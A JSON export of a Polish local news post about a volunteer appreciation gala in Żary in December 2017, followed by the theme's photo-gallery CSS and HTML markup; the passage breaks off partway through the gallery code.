{"id":9562,"date":"2017-12-09T16:52:17","date_gmt":"2017-12-09T15:52:17","guid":{"rendered":"http:\/\/moja24.pl\/?p=9562"},"modified":"2019-04-27T02:09:13","modified_gmt":"2019-04-27T00:09:13","slug":"zary-dziekuja-wolontariuszom-z-okazji-ich-swieta-zdjecia","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/12\/09\/zary-dziekuja-wolontariuszom-z-okazji-ich-swieta-zdjecia\/","title":{"rendered":"\u017bary dzi\u0119kuj\u0105 wolontariuszom z okazji ich \u015bwi\u0119ta (zdj\u0119cia)"},"content":{"rendered":"<p><strong>W czwartek 7.12.2017 r. w sali Luna w \u017barach odby\u0142a si\u0119 kolejna impreza pn. III Gala \u017barskiego Wolontariatu z okazji Mi\u0119dzynarodowego Dnia Wolontariusza, kt\u00f3ry przypada co roku 5. grudnia i obchodzony jest uroczy\u015bcie na ca\u0142ym \u015bwiecie.<\/strong><\/p>\n<p>Z tej okazji Burmistrz Miasta \u017bary \u00a0DANUTA MADEJ, zaprosi\u0142a wolontariuszy ponad 40 \u017carskich organizacji, kt\u00f3rzy na co dzie\u0144 pomagaj\u0105 charytatywnie ludziom w potrzebie lub tak jak \u017barskie Stowarzyszenie Ochrony Zwierz\u0105t &#8222;APORT&#8221;- krzywdzonym czy bezdomnym zwierz\u0119tom. Wyr\u00f3\u017cnienia i upominki otrzyma\u0142o ponad 200 \u017carskich wolontariuszy, z kt\u00f3rych najstarszy\u00a0 ma 95 lat, a najm\u0142odszy \u2013 5.<br \/>\nGo\u015bciem honorowym obchod\u00f3w by\u0142a znana aktorka pochodz\u0105ca z Lubska JOANNA BRODZIK, kt\u00f3ra jest prezesem Fundacji Opiekun Serca i od wielu lat pomaga osobom niepe\u0142nosprawnym. Okaza\u0142a si\u0119 niezwykle sympatyczn\u0105 i skromn\u0105 osob\u0105, kt\u00f3ra pi\u0119knie m\u00f3wi\u0142a o potrzebie pomagania innym i cierpliwie pozowa\u0142a do zdj\u0119\u0107 z uczestnikami imprezy.<br \/>\nWydarzenie u\u015bwietni\u0142 finalista ostatniej edycji programu \u201eThe Voice of Poland\u201d \u0141UKASZ \u0141YCZKOWSKI ze swoim zespo\u0142em daj\u0105c energetyczny rockowy koncert i wci\u0105gaj\u0105c publiczno\u015b\u0107 do wsp\u00f3lnej zabawy. Po zako\u0144czeniu imprezy w holu Luny czeka\u0142y na uczestnik\u00f3w r\u00f3\u017cne napoje i s\u0142odki pocz\u0119stunek.<\/p>\n<p>Mi\u0142\u0105 pami\u0105tk\u0105 tego wydarzenia b\u0119dzie z pewno\u015bci\u0105 r\u00f3wnie\u017c zbiorowe selfie go\u015bci oraz wszystkich uczestnik\u00f3w imprezy, kt\u00f3re zrobi\u0142 prowadz\u0105cy Gal\u0119 Micha\u0142 Rudnicki.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-6-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-8-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item14 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-16-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item15 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item16 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item17 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item18 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item19 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item20 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item21 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item22 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item23 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item24 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-27-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item25 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-28-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item26 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-29-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item27 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item28 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item29 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item30 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item31 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-36-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item32 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddd002ed22  .td-doubleSlider-2 .td-item33 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69eddd002ed22\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Podzi\u0119kowanie \u017carskim wolontariuszom - 7 grudnia 2017 r.<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 33<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-3.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-4.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-5.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-6.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-6-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-6-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-6-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-6.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (7)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-7.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-8.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (8)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-8-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-8-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-8-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-8.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (9)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-9.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (10)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-10.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (11)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-11.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (12)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-12.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (13)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-13.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (14)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-14.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" 